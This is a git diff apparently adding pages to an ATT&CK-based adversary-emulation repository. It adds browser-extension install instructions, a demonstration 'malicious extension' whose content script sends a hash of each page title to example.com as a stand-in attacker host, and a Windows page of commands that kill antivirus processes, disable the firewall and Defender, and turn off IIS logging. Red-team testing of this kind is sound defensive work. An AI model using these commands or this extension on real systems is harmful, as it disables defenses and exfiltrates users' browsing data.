diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md new file mode 100644 index 0000000..3550fb8 --- /dev/null +++ b/Linux/Collection/Browser_Extensions.md @@ -0,0 +1,24 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome (Developer Mode) + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' + +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Linux/Payloads/Browser_Extension/inline.js b/Linux/Payloads/Browser_Extension/inline.js new file mode 100644 index 0000000..15a8e4c --- /dev/null +++ b/Linux/Payloads/Browser_Extension/inline.js @@ -0,0 +1,37 @@ +function exfil(str) { + // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included. + // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com + // and probably a thousand other methods. But this one is easy. + var buffer = new TextEncoder("utf-8").encode(str); + return crypto.subtle.digest("SHA-256", buffer).then(callUrl); +} + +function callUrl(buffer) { + // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls + // except it's example.com so w/e + var digest = hex(buffer); + var url = "https://example.com/" + digest; + console.log("Exfiltrating data to " + url) + var xmlHttp = new XMLHttpRequest(); + xmlHttp.open( "GET", url, true); + xmlHttp.send( null); + return digest; +} + +function hex(buffer) { + // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest + var hexCodes = []; + var view = new DataView(buffer); + for (var i = 0; i < view.byteLength; i += 4) { + var value = view.getUint32(i) + var stringValue = value.toString(16) + var padding = '00000000' + var paddedValue = (padding + stringValue).slice(-padding.length) + hexCodes.push(paddedValue); + } + var athing = hexCodes.join(""); + return hexCodes.join(""); +} + +// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here. +var digest = exfil(document.title); \ No newline at end of file diff --git a/Linux/Payloads/Browser_Extension/manifest.json b/Linux/Payloads/Browser_Extension/manifest.json new file mode 100644 index 0000000..a4243cb --- /dev/null +++ b/Linux/Payloads/Browser_Extension/manifest.json @@ -0,0 +1,16 @@ +{ + "name": "Minimum Viable Malicious Extension", + "description": "Base Level Extension", + "version": "1.0", + "manifest_version": 2, + "content_scripts": [ + { + "matches": [ + "" + ], + "js": [ + "inline.js" + ] + } + ] +} \ No newline at end of file diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md new file mode 100644 index 0000000..3550fb8 --- /dev/null +++ b/Linux/Persistence/Browser_Extensions.md @@ -0,0 +1,24 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome (Developer Mode) + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' + +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Linux/README.md b/Linux/README.md index 825187f..504087b 100644 --- a/Linux/README.md +++ b/Linux/README.md @@ -4,14 +4,14 @@ |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy | -| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | -| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | -| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | -| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | -| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | -| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication | +| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | +| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | +| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | +| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | +| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels | +| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels | +| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication | | | | Masquerading | | | | | | | Multilayer Encryption | | | | Redundant Access | | | | | | | Remote File Copy | | | | Scripting | | | | | | | Standard Application Layer Protocol | diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md new file mode 100644 index 0000000..3550fb8 --- /dev/null +++ b/Mac/Collection/Browser_Extensions.md @@ -0,0 +1,24 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome (Developer Mode) + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' + +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Mac/Payloads/Browser_Extension/inline.js b/Mac/Payloads/Browser_Extension/inline.js new file mode 100644 index 0000000..15a8e4c --- /dev/null +++ b/Mac/Payloads/Browser_Extension/inline.js @@ -0,0 +1,37 @@ +function exfil(str) { + // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included. + // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com + // and probably a thousand other methods. But this one is easy. + var buffer = new TextEncoder("utf-8").encode(str); + return crypto.subtle.digest("SHA-256", buffer).then(callUrl); +} + +function callUrl(buffer) { + // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls + // except it's example.com so w/e + var digest = hex(buffer); + var url = "https://example.com/" + digest; + console.log("Exfiltrating data to " + url) + var xmlHttp = new XMLHttpRequest(); + xmlHttp.open( "GET", url, true); + xmlHttp.send( null); + return digest; +} + +function hex(buffer) { + // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest + var hexCodes = []; + var view = new DataView(buffer); + for (var i = 0; i < view.byteLength; i += 4) { + var value = view.getUint32(i) + var stringValue = value.toString(16) + var padding = '00000000' + var paddedValue = (padding + stringValue).slice(-padding.length) + hexCodes.push(paddedValue); + } + var athing = hexCodes.join(""); + return hexCodes.join(""); +} + +// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here. +var digest = exfil(document.title); \ No newline at end of file diff --git a/Mac/Payloads/Browser_Extension/manifest.json b/Mac/Payloads/Browser_Extension/manifest.json new file mode 100644 index 0000000..a4243cb --- /dev/null +++ b/Mac/Payloads/Browser_Extension/manifest.json @@ -0,0 +1,16 @@ +{ + "name": "Minimum Viable Malicious Extension", + "description": "Base Level Extension", + "version": "1.0", + "manifest_version": 2, + "content_scripts": [ + { + "matches": [ + "" + ], + "js": [ + "inline.js" + ] + } + ] +} \ No newline at end of file diff --git a/Mac/Persistence/Browser_Extensions.md b/Mac/Persistence/Browser_Extensions.md new file mode 100644 index 0000000..3550fb8 --- /dev/null +++ b/Mac/Persistence/Browser_Extensions.md @@ -0,0 +1,24 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome (Developer Mode) + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' + +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Mac/README.md b/Mac/README.md index 141b637..64fab2b 100644 --- a/Mac/README.md +++ b/Mac/README.md @@ -3,7 +3,7 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |------------------------------|-------------------------------|---------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | -| Browser Extensions | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Browser Extensions](Persistence/Browser_Extensions.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | | [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Browser Extensions | Data Encrypted | Connection Proxy | | Dylib Hijacking | Plist Modification | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Exploitation of Vulnerability | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Logon Scripts](Persistence/Logon_Scripts.md) | Launchctl | Clipboard Data | Data Transfer Size Limits | [Custom Command and Control Protocol](Command_and_Control/Custom_Command_and_Control_Protocol.md) | | Hidden Files and Directories | Process Injection | Exploitation of Vulnerability | Input Capture | [Network Share Discovery](Discovery/Network_Share_Discovery.md) | Remote File Copy | Local Job Scheduling | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | diff --git a/Windows/Collection/Browser_Extensions.md b/Windows/Collection/Browser_Extensions.md new file mode 100644 index 0000000..3550fb8 --- /dev/null +++ b/Windows/Collection/Browser_Extensions.md @@ -0,0 +1,24 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome (Developer Mode) + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' + +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Windows/Defense_Evasion/Disabling_Security_Tools.md b/Windows/Defense_Evasion/Disabling_Security_Tools.md new file mode 100644 index 0000000..4d4d51f --- /dev/null +++ b/Windows/Defense_Evasion/Disabling_Security_Tools.md @@ -0,0 +1,28 @@ +# Disabling Security Tools + +MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089) + +## Terminate Anti-Virus Processes +`Taskkill /F /IM avprocess.exe` + +## Disable Firewall +`netsh firewall set opmode disable` + +## Stop Windows Security Center +`net stop wscsvc` + +## Stop Windows Defender + +### Windows 7/8 +`net stop windefend` + +### Windows 10 +`PS > Set-MpPreference -DisableRealtimeMonitoring $true` + +## Disable Default Web Site Logging IIS 7 + +### Disable Default Web Site Logging IIS 7 +`%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site" -section:system.webServer/httpLogging /dontLog:"True" /commit:apphost` + +### Restart Default Web Site IIS 7 +`%windir%\system32\inetsrv\appcmd.exe stop site /site.name:"Default Web Site" && %windir%\system32\inetsrv\appcmd.exe start site /site.name:"Default Web Site"` diff --git a/Windows/Payloads/Browser_Extension/inline.js b/Windows/Payloads/Browser_Extension/inline.js new file mode 100644 index 0000000..15a8e4c --- /dev/null +++ b/Windows/Payloads/Browser_Extension/inline.js @@ -0,0 +1,37 @@ +function exfil(str) { + // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included. + // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com + // and probably a thousand other methods. But this one is easy. + var buffer = new TextEncoder("utf-8").encode(str); + return crypto.subtle.digest("SHA-256", buffer).then(callUrl); +} + +function callUrl(buffer) { + // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls + // except it's example.com so w/e + var digest = hex(buffer); + var url = "https://example.com/" + digest; + console.log("Exfiltrating data to " + url) + var xmlHttp = new XMLHttpRequest(); + xmlHttp.open( "GET", url, true); + xmlHttp.send( null); + return digest; +} + +function hex(buffer) { + // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest + var hexCodes = []; + var view = new DataView(buffer); + for (var i = 0; i < view.byteLength; i += 4) { + var value = view.getUint32(i) + var stringValue = value.toString(16) + var padding = '00000000' + var paddedValue = (padding + stringValue).slice(-padding.length) + hexCodes.push(paddedValue); + } + var athing = hexCodes.join(""); + return hexCodes.join(""); +} + +// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here. +var digest = exfil(document.title); \ No newline at end of file diff --git a/Windows/Payloads/Browser_Extension/manifest.json b/Windows/Payloads/Browser_Extension/manifest.json new file mode 100644 index 0000000..a4243cb --- /dev/null +++ b/Windows/Payloads/Browser_Extension/manifest.json @@ -0,0 +1,16 @@ +{ + "name": "Minimum Viable Malicious Extension", + "description": "Base Level Extension", + "version": "1.0", + "manifest_version": 2, + "content_scripts": [ + { + "matches": [ + "" + ], + "js": [ + "inline.js" + ] + } + ] +} \ No newline at end of file diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md new file mode 100644 index 0000000..3550fb8 --- /dev/null +++ b/Windows/Persistence/Browser_Extensions.md @@ -0,0 +1,24 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome (Developer Mode) + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' + +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Windows/README.md b/Windows/README.md index 1228cf4..54807d3 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -4,14 +4,14 @@ |-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | | AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | -| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | | [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | -| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | -| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | +| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | | [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy | | DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication | | External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption |